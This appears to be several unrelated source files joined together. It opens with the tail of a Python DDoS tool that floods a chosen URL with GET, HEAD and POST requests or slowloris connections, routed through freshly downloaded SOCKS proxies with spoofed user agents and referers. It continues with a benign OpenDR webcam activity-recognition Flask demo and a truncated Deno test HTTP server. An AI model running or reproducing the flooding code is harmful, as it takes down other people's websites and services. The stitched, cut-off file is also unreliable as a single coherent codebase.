text/html, application/xhtml+xml", "Accept-Language: en-US,en;q=0.5\r\n", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n", "Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",] referers = [ "https://www.google.com/search?q=", "https://check-host.net/", "https://www.facebook.com/", "https://www.youtube.com/", "https://www.fbi.com/", "https://www.bing.com/search?q=", "https://r.search.yahoo.com/", "https://www.cia.gov/index.html", "https://vk.com/profile.php?redirect=", "https://www.usatoday.com/search/results?q=", "https://help.baidu.com/searchResult?keywords=", "https://steamcommunity.com/market/search?q=", "https://www.ted.com/search?q=", 
"https://play.google.com/store/search?q=", "https://www.qwant.com/search?q=", "https://soda.demo.socrata.com/resource/4tka-6guv.json?$q=", "https://www.google.ad/search?q=", "https://www.google.ae/search?q=", "https://www.google.com.af/search?q=", "https://www.google.com.ag/search?q=", "https://www.google.com.ai/search?q=", "https://www.google.al/search?q=", "https://www.google.am/search?q=", "https://www.google.co.ao/search?q=", ] ind_dict = {} data = "" cookies = "" strings = "asdfghjklqwertyuiopZXCVBNMQWERTYUIOPASDFGHJKLzxcvbnm1234567890&" ################################################### Intn = random.randint Choice = random.choice ################################################### def build_threads(mode,thread_num,event,socks_type,ind_rlock): if mode == "post": for _ in range(thread_num): th = threading.Thread(target = post,args=(event,socks_type,ind_rlock,)) th.setDaemon(True) th.start() elif mode == "cc": for _ in range(thread_num): th = threading.Thread(target = cc,args=(event,socks_type,ind_rlock,)) th.setDaemon(True) th.start() elif mode == "head": for _ in range(thread_num): th = threading.Thread(target = head,args=(event,socks_type,ind_rlock,)) th.setDaemon(True) th.start() def getuseragent(): platform = Choice(['Macintosh', 'Windows', 'X11']) if platform == 'Macintosh': os = Choice(['68K', 'PPC', 'Intel Mac OS X']) elif platform == 'Windows': os = Choice(['Win3.11', 'WinNT3.51', 'WinNT4.0', 'Windows NT 5.0', 'Windows NT 5.1', 'Windows NT 5.2', 'Windows NT 6.0', 'Windows NT 6.1', 'Windows NT 6.2', 'Win 9x 4.90', 'WindowsCE', 'Windows XP', 'Windows 7', 'Windows 8', 'Windows NT 10.0; Win64; x64']) elif platform == 'X11': os = Choice(['Linux i686', 'Linux x86_64']) browser = Choice(['chrome', 'firefox', 'ie']) if browser == 'chrome': webkit = str(Intn(500, 599)) version = str(Intn(0, 99)) + '.0' + str(Intn(0, 9999)) + '.' 
+ str(Intn(0, 999)) return 'Mozilla/5.0 (' + os + ') AppleWebKit/' + webkit + '.0 (KHTML, like Gecko) Chrome/' + version + ' Safari/' + webkit elif browser == 'firefox': currentYear = datetime.date.today().year year = str(Intn(2020, currentYear)) month = Intn(1, 12) if month < 10: month = '0' + str(month) else: month = str(month) day = Intn(1, 30) if day < 10: day = '0' + str(day) else: day = str(day) gecko = year + month + day version = str(Intn(1, 72)) + '.0' return 'Mozilla/5.0 (' + os + '; rv:' + version + ') Gecko/' + gecko + ' Firefox/' + version elif browser == 'ie': version = str(Intn(1, 99)) + '.0' engine = str(Intn(1, 99)) + '.0' option = Choice([True, False]) if option == True: token = Choice(['.NET CLR', 'SV1', 'Tablet PC', 'Win64; IA64', 'Win64; x64', 'WOW64']) + '; ' else: token = '' return 'Mozilla/5.0 (compatible; MSIE ' + version + '; ' + os + '; ' + token + 'Trident/' + engine + ')' def randomurl(): return str(Choice(strings)+str(Intn(0,271400281257))+Choice(strings)+str(Intn(0,271004281257))+Choice(strings) + Choice(strings)+str(Intn(0,271400281257))+Choice(strings)+str(Intn(0,271004281257))+Choice(strings)) def GenReqHeader(method): header = "" if method == "get" or method == "head": connection = "Connection: Keep-Alive\r\n" if cookies != "": connection += "Cookies: "+str(cookies)+"\r\n" accept = Choice(acceptall) referer = "Referer: "+Choice(referers)+ target + path + "\r\n" useragent = "User-Agent: " + getuseragent() + "\r\n" header = referer + useragent + accept + connection + "\r\n" elif method == "post": post_host = "POST " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" content = "Content-Type: application/x-www-form-urlencoded\r\nX-requested-with:XMLHttpRequest\r\n" refer = "Referer: http://"+ target + path + "\r\n" user_agent = "User-Agent: " + getuseragent() + "\r\n" accept = Choice(acceptall) if mode2 != "y":# You can enable customize data data = str(random._urandom(16)) length = "Content-Length: "+str(len(data))+" \r\nConnection: 
Keep-Alive\r\n" if cookies != "": length += "Cookies: "+str(cookies)+"\r\n" header = post_host + accept + refer + content + user_agent + length + "\n" + data + "\r\n\r\n" return header def ParseUrl(original_url): global target global path global port global protocol original_url = original_url.strip() url = "" path = "/"#default value port = 80 #default value protocol = "http" #http(s)://www.example.com:1337/xxx if original_url[:7] == "http://": url = original_url[7:] elif original_url[:8] == "https://": url = original_url[8:] protocol = "https" #http(s)://www.example.com:1337/xxx ==> www.example.com:1337/xxx #print(url) #for debug tmp = url.split("/") website = tmp[0]#www.example.com:1337/xxx ==> www.example.com:1337 check = website.split(":") if len(check) != 1:#detect the port port = int(check[1]) else: if protocol == "https": port = 443 target = check[0] if len(tmp) > 1: path = url.replace(website,"",1)#get the path www.example.com/xxx ==> /xxx def InputOption(question,options,default): ans = "" while ans == "": ans = str(input(question)).strip().lower() if ans == "": ans = default elif ans not in options: print("> Please enter the correct option") ans = "" continue return ans def CheckerOption(): global proxies N = str(input("> Do you need to get socks list?(y/n,default=y):")) if N == 'y' or N == "" : downloadsocks(choice) else: pass if choice == "4": out_file = str(input("> Socks4 Proxy file path(socks4.txt):")) if out_file == '': out_file = str("socks4.txt") else: out_file = str(out_file) check_list(out_file) proxies = open(out_file).readlines() elif choice == "5": out_file = str(input("> Socks5 Proxy file path(socks5.txt):")) if out_file == '': out_file = str("socks5.txt") else: out_file = str(out_file) check_list(out_file) proxies = open(out_file).readlines() print ("> Number Of Socks%s Proxies: %s" %(choice,len(proxies))) time.sleep(0.03) ans = str(input("> Do u need to check the socks list?(y/n, defualt=y):")) if ans == "": ans = "y" if ans == "y": ms = 
str(input("> Delay of socks(seconds, default=1):")) if ms == "": ms = int(1) else : try: ms = int(ms) except : ms = float(ms) check_socks(ms) def SetupIndDict(): global ind_dict for proxy in proxies: ind_dict[proxy.strip()] = 0 def OutputToScreen(ind_rlock): global ind_dict i = 0 sp_char = ["|","/","-","\\"] while 1: if i > 3: i = 0 print("{:^70}".format(''' ▄████████ ███ ███ ▄████████ ▄████████ ▄█ ▄█▄ ▄█ ▄████████ ███ █▄ ███▄▄▄▄ ▄████████ ▄█ █▄ ▄████████ ████████▄ ███ ███ ▀█████████▄ ▀█████████▄ ███ ███ ███ ███ ███ ▄███▀ ███ ███ ███ ███ ███ ███▀▀▀██▄ ███ ███ ███ ███ ███ ███ ███ ▀███ ███ ███ ▀███▀▀██ ▀███▀▀██ ███ ███ ███ █▀ ███▐██▀ ███ ███ ███ ███ ███ ███ ███ ███ █▀ ███ ███ ███ █▀ ███ ███ ███ ███ ███ ▀ ███ ▀ ███ ███ ███ ▄█████▀ ███ ███ ███ ███ ███ ███ ███ ███ ▄███▄▄▄▄███▄▄ ▄███▄▄▄ ███ ███ ▀███████████ ███ ███ ▀███████████ ███ ▀▀█████▄ ███ ▀███████████ ███ ███ ███ ███ ███ ▀▀███▀▀▀▀███▀ ▀▀███▀▀▀ ███ ███ ███ ███ ███ ███ ███ ███ ███ █▄ ███▐██▄ ███ ███ ███ ███ ███ ███ ███ ███ █▄ ███ ███ ███ █▄ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▀███▄ ███▌ ▄ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▄███ ███ █▀ ▄████▀ ▄████▀ ███ █▀ ████████▀ ███ ▀█▀ █████▄▄██ ███ █▀ ████████▀ ▀█ █▀ ████████▀ ███ █▀ ██████████ ████████▀ ''' )) print("{:^70}".format(''' _ __ _ ____ ___ ____ | | / /\ \ \_/ | |_ | |_) / / |_|__ /_/--\ |_| |_|__ |_| \ /_/ ''')) #1. xxx.xxx.xxx.xxx:xxxxx ==> DDoS: xxxx ind_rlock.acquire() top10 = sorted(ind_dict, key=ind_dict.get, reverse=True) for num in range(10): top = "none" rps = 0 if len(ind_dict) != 0: top = top10[num] rps = ind_dict[top] ind_dict[top] = 0 print("{:^70}".format("{:2d}. 
{:^22s} | DDoS: {:d}".format(num+1,top,rps))) total = 0 for k,v in ind_dict.items(): total = total + v ind_dict[k] = 0 ind_rlock.release() print("{:^70}".format(" ["+sp_char[i]+"]L7 attack | Total DDoS:"+str(total))) i+=1 time.sleep(1) print("\n"*100) def cc(event,socks_type,ind_rlock): global ind_dict header = GenReqHeader("get") proxy = Choice(proxies).strip().split(":") add = "?" if "?" in path: add = "&" event.wait() while True: try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) if brute: s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.connect((str(target), int(port))) if protocol == "https": ctx = ssl.SSLContext() s = ctx.wrap_socket(s,server_hostname=target) try: for _ in range(multiple+1): get_host = "GET " + path + add + randomurl() + " HTTP/1.1\r\nHost: " + target + "\r\n" request = get_host + header sent = s.send(str.encode(request)) if not sent: proxy = Choice(proxies).strip().split(":") break s.close() except: s.close() ind_rlock.acquire() ind_dict[(proxy[0]+":"+proxy[1]).strip()] += multiple+1 ind_rlock.release() except: s.close() def head(event,socks_type,ind_rlock):#HEAD MODE global ind_dict header = GenReqHeader("head") proxy = Choice(proxies).strip().split(":") add = "?" if "?" 
in path: add = "&" event.wait() while True: try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) if brute: s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.connect((str(target), int(port))) if protocol == "https": ctx = ssl.SSLContext() s = ctx.wrap_socket(s,server_hostname=target) try: for _ in range(multiple+1): head_host = "HEAD " + path + add + randomurl() + " HTTP/1.1\r\nHost: " + target + "\r\n" request = head_host + header sent = s.send(str.encode(request)) if not sent: proxy = Choice(proxies).strip().split(":") break s.close() except: s.close() ind_rlock.acquire() ind_dict[(proxy[0]+":"+proxy[1]).strip()] += multiple+1 ind_rlock.release() except:#dirty fix s.close() def post(event,socks_type,ind_rlock): global ind_dict request = GenReqHeader("post") proxy = Choice(proxies).strip().split(":") event.wait() while True: try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) if brute: s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.connect((str(target), int(port))) if str(port) == '443': # //AUTO Enable SSL MODE :) ctx = ssl.SSLContext() s = ctx.wrap_socket(s,server_hostname=target) try: for _ in range(multiple+1): sent = s.send(str.encode(request)) if not sent: proxy = Choice(proxies).strip().split(":") break s.close() except: s.close() ind_rlock.acquire() ind_dict[(proxy[0]+":"+proxy[1]).strip()] += multiple+1 ind_rlock.release() except: s.close() socket_list=[] def slow(conn,socks_type): proxy = Choice(proxies).strip().split(":") for _ in range(conn): try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) s.settimeout(1) s.connect((str(target), int(port))) if str(port) 
== '443': ctx = ssl.SSLContext() s = ctx.wrap_socket(s,server_hostname=target) s.send("GET /?{} HTTP/1.1\r\n".format(Intn(0, 2000)).encode("utf-8"))# Slowloris format header s.send("User-Agent: {}\r\n".format(getuseragent()).encode("utf-8")) s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8")) if cookies != "": s.send(("Cookies: "+str(cookies)+"\r\n").encode("utf-8")) s.send(("Connection:keep-alive").encode("utf-8")) socket_list.append(s) sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r") sys.stdout.flush() except: s.close() proxy = Choice(proxies).strip().split(":")#Only change proxy when error, increase the performance sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r") sys.stdout.flush() while True: for s in list(socket_list): try: s.send("X-a: {}\r\n".format(Intn(1, 5000)).encode("utf-8")) sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r") sys.stdout.flush() except: s.close() socket_list.remove(s) sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r") sys.stdout.flush() proxy = Choice(proxies).strip().split(":") for _ in range(conn - len(socket_list)): try: if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) s.settimeout(1) s.connect((str(target), int(port))) if int(port) == 443: ctx = ssl.SSLContext() s = ctx.wrap_socket(s,server_hostname=target) s.send("GET /?{} HTTP/1.1\r\n".format(Intn(0, 2000)).encode("utf-8"))# Slowloris format header s.send("User-Agent: {}\r\n".format(getuseragent).encode("utf-8")) s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8")) if cookies != "": s.send(("Cookies: "+str(cookies)+"\r\n").encode("utf-8")) s.send(("Connection:keep-alive").encode("utf-8")) socket_list.append(s) sys.stdout.write("[*] Running Slow Attack || Connections: 
"+str(len(socket_list))+"\r") sys.stdout.flush() except: proxy = Choice(proxies).strip().split(":") sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r") sys.stdout.flush() pass nums = 0 def checking(lines,socks_type,ms,rlock,): global nums global proxies proxy = lines.strip().split(":") if len(proxy) != 2: rlock.acquire() proxies.remove(lines) rlock.release() return err = 0 while True: if err == 3: rlock.acquire() proxies.remove(lines) rlock.release() break try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) s.settimeout(ms) s.connect((str(target), int(port))) if protocol == "https": ctx = ssl.SSLContext() s = ctx.wrap_socket(s,server_hostname=target) sent = s.send(str.encode("GET / HTTP/1.1\r\n\r\n")) if not sent: err += 1 s.close() break except: err +=1 nums += 1 def check_socks(ms): global nums thread_list=[] rlock = threading.RLock() for lines in list(proxies): if choice == "5": th = threading.Thread(target=checking,args=(lines,5,ms,rlock,)) th.start() if choice == "4": th = threading.Thread(target=checking,args=(lines,4,ms,rlock,)) th.start() thread_list.append(th) time.sleep(0.01) sys.stdout.write("> Checked "+str(nums)+" proxies\r") sys.stdout.flush() for th in list(thread_list): th.join() sys.stdout.write("> Checked "+str(nums)+" proxies\r") sys.stdout.flush() print("\r\n> Checked all proxies, Total Worked:"+str(len(proxies))) ans = input("> Do u want to save them in a file? 
(y/n, default=y)") if ans == "y" or ans == "": if choice == "4": with open("socks4.txt", 'wb') as fp: for lines in list(proxies): fp.write(bytes(lines,encoding='utf8')) fp.close() print("> They are saved in socks4.txt.") elif choice == "5": with open("socks5.txt", 'wb') as fp: for lines in list(proxies): fp.write(bytes(lines,encoding='utf8')) fp.close() print("> They are saved in socks5.txt.") def check_list(socks_file): print("> Checking list") temp = open(socks_file).readlines() temp_list = [] for i in temp: if i not in temp_list: if ':' in i: temp_list.append(i) rfile = open(socks_file, "wb") for i in list(temp_list): rfile.write(bytes(i,encoding='utf-8')) rfile.close() def downloadsocks(choice): if choice == "4": f = open("socks4.txt",'wb') try: r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks4&country=all",timeout=5) f.write(r.content) except: pass try: r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks4",timeout=5) f.write(r.content) except: pass try: r = requests.get("https://www.proxyscan.io/download?type=socks4",timeout=5) f.write(r.content) except: pass try: r = requests.get("https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks4.txt",timeout=5) f.write(r.content) f.close() except: f.close() try: r = requests.get("https://www.socks-proxy.net/",timeout=5) part = str(r.content) part = part.split("<tbody>") part = part[1].split("</tbody>") part = part[0].split("<tr><td>") proxies = "" for proxy in part: proxy = proxy.split("</td><td>") try: proxies=proxies + proxy[0] + ":" + proxy[1] + "\n" except: pass out_file = open("socks4.txt","a") out_file.write(proxies) out_file.close() except: pass print("> Have already downloaded socks4 list as socks4.txt") if choice == "5": f = open("socks5.txt",'wb') try: r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks5&country=all",timeout=5) f.write(r.content) except: pass try: r = 
requests.get("https://www.proxy-list.download/api/v1/get?type=socks5",timeout=5) f.write(r.content) f.close() except: pass try: r = requests.get("https://www.proxyscan.io/download?type=socks5",timeout=5) f.write(r.content) f.close() except: pass try: r = requests.get("https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks5.txt",timeout=5) f.write(r.content) except: pass try: r = requests.get("https://raw.githubusercontent.com/hookzof/socks5_list/master/proxy.txt",timeout=5) f.write(r.content) f.close() except: f.close() print("> Have already downloaded socks5 list as socks5.txt") def main(): global multiple global choice global data global mode2 global cookies global brute print("> Mode: [cc/post/head/slow/check]") mode = InputOption("> Choose Your Mode (default=cc) :",["cc","post","head","slow","check"],"cc") url = str(input("> Input the target url:")).strip() ParseUrl(url) if mode == "post": mode2 = InputOption("> Customize post data? (y/n, default=n):",["y","n","yes","no"],"n") if mode2 == "y": data = open(input("> Input the file's path:").strip()).readlines() data = ' '.join([str(txt) for txt in data]) choice2 = InputOption("> Customize cookies? 
(y/n, default=n):",["y","n","yes","no"],"n") if choice2 == "y": cookies = str(input("Plese input the cookies:")).strip() choice = InputOption("> Choose your socks mode(4/5, default=5):",["4","5"],"5") if choice == "4": socks_type = 4 else: socks_type = 5 if mode == "check": CheckerOption() print("> End of process") return if mode == "slow": thread_num = str(input("> Connections(default=400):")) else: thread_num = str(input("> Threads(default=400):")) if thread_num == "": thread_num = int(400) else: try: thread_num = int(thread_num) except: sys.exit("Error thread number") CheckerOption() ind_rlock = threading.RLock() if mode == "slow": input("Press Enter to continue.") th = threading.Thread(target=slow,args=(thread_num,socks_type,)) th.setDaemon(True) th.start() else: multiple = str(input("> Input the Magnification(default=100):")) if multiple == "": multiple = int(100) else: multiple = int(multiple) brute = str(input("> Enable boost mode[beta](y/n, default=n):")) if brute == "": brute = False elif brute == "y": brute = True elif brute == "n": brute = False event = threading.Event() print("> Building threads...") SetupIndDict() build_threads(mode,thread_num,event,socks_type,ind_rlock) event.clear() input("Press Enter to continue.") event.set() threading.Thread(target=OutputToScreen,args=(ind_rlock,),daemon=True).start() while True: try: time.sleep(0.1) except KeyboardInterrupt: break if __name__ == "__main__": main()
demo.py
# Copyright 2020-2022 OpenDR European Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Webcam human-activity-recognition demo served as an MJPEG stream via Flask.

A background daemon thread runs X3D (clip-based) or CoX3D (frame-by-frame)
inference on the webcam feed and publishes annotated frames; the Flask route
``/video_feed`` streams them to any number of browser tabs.
"""

import argparse
import threading
import time
import traceback
from pathlib import Path
from typing import Dict

import numpy as np
import torch
import torchvision
import cv2
from imutils import resize
from flask import Flask, Response, render_template
from imutils.video import VideoStream

# OpenDR imports
from opendr.perception.activity_recognition import X3DLearner
from opendr.perception.activity_recognition import CoX3DLearner
from opendr.perception.activity_recognition import CLASSES as KINETICS400_CLASSES
from opendr.engine.data import Video, Image

TEXT_COLOR = (0, 0, 255)  # B G R

# Latest annotated frame, shared between the inference thread and the MJPEG
# generator; `lock` makes the hand-off thread-safe when multiple browsers/tabs
# are viewing the stream.
output_frame = None
lock = threading.Lock()

# initialize a flask object
app = Flask(__name__)


@app.route("/")
def index():
    """Serve the landing page that embeds the MJPEG stream."""
    return render_template("index.html")


def runnig_fps(alpha=0.1):
    """Return a closure that yields an exponential moving average of FPS.

    ``alpha`` weighs the newest instantaneous FPS sample.
    NOTE: the misspelled name is kept for backward compatibility with callers.
    """
    t0 = time.time_ns()
    fps_avg = 10  # arbitrary warm start; converges after a few calls

    def wrapped():
        nonlocal t0, fps_avg
        t1 = time.time_ns()
        delta = (t1 - t0) * 1e-9  # ns -> s
        t0 = t1
        fps_avg = alpha * (1 / delta) + (1 - alpha) * fps_avg
        return fps_avg

    return wrapped


def draw_fps(frame, fps):
    """Overlay the FPS estimate in the bottom-left corner of ``frame``."""
    cv2.putText(
        frame,
        f"{fps:.1f} FPS",
        (10, frame.shape[0] - 10),
        cv2.FONT_HERSHEY_SIMPLEX,
        1.1,
        TEXT_COLOR,
        2,
    )


def draw_preds(frame, preds: Dict, threshold=0.0):
    """Overlay class predictions, one per line, skipping all of them when the
    first (top) score is below ``threshold``."""
    if preds[next(iter(preds))] < threshold:
        return
    base_skip = 40
    delta_skip = 30
    for i, (cls, prob) in enumerate(preds.items()):
        cv2.putText(
            frame,
            f"{prob:04.3f} {cls}",
            (10, base_skip + i * delta_skip),
            cv2.FONT_HERSHEY_SIMPLEX,
            1.1,
            TEXT_COLOR,
            2,
        )


def draw_centered_box(frame, border):
    """Draw a centered square box inset by ``border`` pixels.

    Fix: the ``border`` argument was previously overwritten with a
    hard-coded 10, so the parameter had no effect.
    """
    minX = (frame.shape[1] - frame.shape[0]) // 2 + border
    minY = border
    maxX = (frame.shape[1] + frame.shape[0]) // 2 - border
    maxY = frame.shape[0] - border
    cv2.rectangle(frame, (minX, minY), (maxX, maxY), color=TEXT_COLOR, thickness=1)


def center_crop(frame):
    """Return the largest centered square crop of ``frame``."""
    height, width = frame.shape[0], frame.shape[1]
    e = min(height, width)
    x0 = (width - e) // 2
    y0 = (height - e) // 2
    return frame[y0: y0 + e, x0: x0 + e]


def image_har_preprocessing(image_size: int):
    """Return a closure turning a BGR frame into a normalized OpenDR Image."""
    standardize = torchvision.transforms.Normalize(
        mean=(0.45, 0.45, 0.45), std=(0.225, 0.225, 0.225)
    )

    def wrapped(frame):
        frame = resize(frame, height=image_size, width=image_size)
        frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
        frame = torch.tensor(frame).permute((2, 0, 1))  # H, W, C -> C, H, W
        frame = frame / 255.0  # [0, 255] -> [0.0, 1.0]
        frame = standardize(frame)
        # Fix: `np.float` was removed in NumPy 1.24; it was an alias of the
        # builtin `float`, which is what we pass now.
        return Image(frame, dtype=float)

    return wrapped


def video_har_preprocessing(image_size: int, window_size: int):
    """Return a stateful closure that keeps a sliding window of the last
    ``window_size`` normalized frames and emits them as an OpenDR Video.

    The first call pads the window by repeating the initial frame.
    """
    frames = []
    standardize = torchvision.transforms.Normalize(
        mean=(0.45, 0.45, 0.45), std=(0.225, 0.225, 0.225)
    )

    def wrapped(frame):
        nonlocal frames
        frame = resize(frame, height=image_size, width=image_size)
        frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
        frame = torch.tensor(frame).permute((2, 0, 1))  # H, W, C -> C, H, W
        frame = frame / 255.0  # [0, 255] -> [0.0, 1.0]
        frame = standardize(frame)
        if not frames:
            frames = [frame for _ in range(window_size)]
        else:
            frames.pop(0)
            frames.append(frame)
        return Video(torch.stack(frames, dim=1))

    return wrapped


def clean_kinetics_preds(preds):
    """Map raw learner output to a {class name: probability} dict of the top 3."""
    k = 3
    class_scores, class_inds = torch.topk(preds[0].confidence, k=k)
    return {
        KINETICS400_CLASSES[int(class_inds[i])]: float(class_scores[i].item())
        for i in range(k)
    }


def _stream_inference(learner, preprocess):
    """Shared capture -> preprocess -> infer -> annotate loop.

    Publishes each annotated frame to the global ``output_frame`` under
    ``lock``. Runs forever; intended to be started as a daemon thread.
    """
    global vs, output_frame, lock
    fps = runnig_fps()
    while True:
        try:
            frame = vs.read()
            if frame is None:
                # Camera not warmed up yet (or stream ended); try again.
                continue
            frame = center_crop(frame)
            vid = preprocess(frame)
            preds = learner.infer(vid)
            preds = clean_kinetics_preds(preds)
            frame = cv2.flip(frame, 1)  # Flip horizontally for webcam-compatibility
            draw_preds(frame, preds)
            draw_fps(frame, fps())
            with lock:
                output_frame = frame.copy()
        except Exception:
            # Best-effort demo loop: report the failure instead of silently
            # swallowing it (the old `pass` hid real errors), then keep going.
            traceback.print_exc()


def x3d_activity_recognition(model_name, device):
    """Run clip-based X3D activity recognition on the webcam feed."""
    learner = X3DLearner(device=device, backbone=model_name, num_workers=0)
    X3DLearner.download(path="model_weights", model_names={model_name})
    learner.load(Path("model_weights") / f"x3d_{model_name}.pyth")
    preprocess = video_har_preprocessing(
        image_size=learner.model_hparams["image_size"],
        window_size=learner.model_hparams["frames_per_clip"],
    )
    _stream_inference(learner, preprocess)


def cox3d_activity_recognition(model_name, device):
    """Run frame-by-frame CoX3D activity recognition on the webcam feed."""
    learner = CoX3DLearner(device=device, backbone=model_name, num_workers=0)
    # CoX3D reuses the X3D checkpoint weights.
    CoX3DLearner.download(path="model_weights", model_names={model_name})
    learner.load(Path("model_weights") / f"x3d_{model_name}.pyth")
    preprocess = image_har_preprocessing(image_size=learner.model_hparams["image_size"])
    _stream_inference(learner, preprocess)


def generate():
    """Yield the shared output frame as an MJPEG multipart byte stream."""
    # grab global references to the output frame and lock variables
    global output_frame, lock
    # loop over frames from the output stream
    while True:
        # wait until the lock is acquired
        with lock:
            # check if the output frame is available, otherwise skip
            # the iteration of the loop
            if output_frame is None:
                continue
            # encode the frame in JPEG format
            (flag, encodedImage) = cv2.imencode(".jpg", output_frame)
            # ensure the frame was successfully encoded
            if not flag:
                continue
        # yield the output frame in the byte format
        yield (
            b"--frame\r\n"
            b"Content-Type: image/jpeg\r\n\r\n" + bytearray(encodedImage) + b"\r\n"
        )


@app.route("/video_feed")
def video_feed():
    """Return the MJPEG streaming response (multipart/x-mixed-replace)."""
    return Response(generate(), mimetype="multipart/x-mixed-replace; boundary=frame")


# check to see if this is the main thread of execution
if __name__ == "__main__":
    # construct the argument parser and parse command line arguments
    ap = argparse.ArgumentParser()
    ap.add_argument(
        "-i", "--ip", type=str, required=True, help="IP address of the device"
    )
    ap.add_argument(
        "-o",
        "--port",
        type=int,
        required=True,
        help="Ephemeral port number of the server (1024 to 65535)",
    )
    ap.add_argument(
        "-m",
        "--model_name",
        type=str,
        default="xs",
        help="Model identifier",
    )
    ap.add_argument(
        "-d",
        "--device",
        type=str,
        default="cpu",
        help="Device",
    )
    ap.add_argument(
        "-v",
        "--video_source",
        type=int,
        default=0,
        help="ID of the video source to use",
    )
    ap.add_argument(
        "-a",
        "--algorithm",
        type=str,
        default="x3d",
        help="Which algortihm to run",
        choices=["cox3d", "x3d"],
    )
    args = vars(ap.parse_args())

    # initialize video stream and allow the camera sensor to warmup
    # vs = VideoStream(usePiCamera=1).start()
    vs = VideoStream(src=args["video_source"]).start()
    time.sleep(2.0)

    algorithm = {
        "x3d": x3d_activity_recognition,
        "cox3d": cox3d_activity_recognition,
    }[args["algorithm"]]

    # start the inference loop in a background daemon thread
    t = threading.Thread(target=algorithm, args=(args["model_name"], args["device"]))
    t.daemon = True
    t.start()

    # start the flask app; the reloader is disabled because it would respawn
    # the process and re-open the camera
    app.run(
        host=args["ip"],
        port=args["port"],
        debug=True,
        threaded=True,
        use_reloader=False,
    )

    # release the video stream pointer
    vs.stop()
http_server.py
#!/usr/bin/env python
# Copyright 2018 the Deno authors. All rights reserved. MIT license.
# Many tests expect there to be an http server on port 4545 servering the deno
# root directory.
# NOTE(review): this is Python 2 code (print statements, SimpleHTTPServer,
# headers.has_key); it will not run under Python 3.

import os
import sys
from threading import Thread
import SimpleHTTPServer
import SocketServer
from util import root_path
from time import sleep

PORT = 4545
REDIRECT_PORT = 4546


class ContentTypeHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    """File server handler with test-specific MIME types and fixture routes."""

    def do_GET(self):
        # Serve a canned multipart/form-data body for the multipart fixture;
        # everything else falls through to plain static file serving.
        if "multipart_form_data.txt" in self.path:
            self.protocol_version = 'HTTP/1.1'
            self.send_response(200, 'OK')
            self.send_header('Content-type',
                             'multipart/form-data;boundary=boundary')
            self.end_headers()
            self.wfile.write(
                bytes('Preamble\r\n'
                      '--boundary\t \r\n'
                      'Content-Disposition: form-data; name="field_1"\r\n'
                      '\r\n'
                      'value_1 \r\n'
                      '\r\n--boundary\r\n'
                      'Content-Disposition: form-data; name="field_2"; '
                      'filename="file.js"\r\n'
                      'Content-Type: text/javascript\r\n'
                      '\r\n'
                      'console.log("Hi")'
                      '\r\n--boundary--\r\n'
                      'Epilogue'))
            return
        return SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)

    def do_POST(self):
        # Simple echo server for request reflection: echoes the request body
        # (and content-type, when present) back to the client.
        if "echo_server" in self.path:
            self.protocol_version = 'HTTP/1.1'
            self.send_response(200, 'OK')
            if self.headers.has_key('content-type'):
                self.send_header('content-type',
                                 self.headers.getheader('content-type'))
            self.end_headers()
            data_string = self.rfile.read(int(self.headers['Content-Length']))
            self.wfile.write(bytes(data_string))
            return
        # Any other POST is rejected.
        self.protocol_version = 'HTTP/1.1'
        self.send_response(501)
        self.send_header('content-type', 'text/plain')
        self.end_headers()
        self.wfile.write(bytes('Server does not support this operation'))

    def guess_type(self, path):
        # Map special fixture-name patterns to explicit MIME types so tests
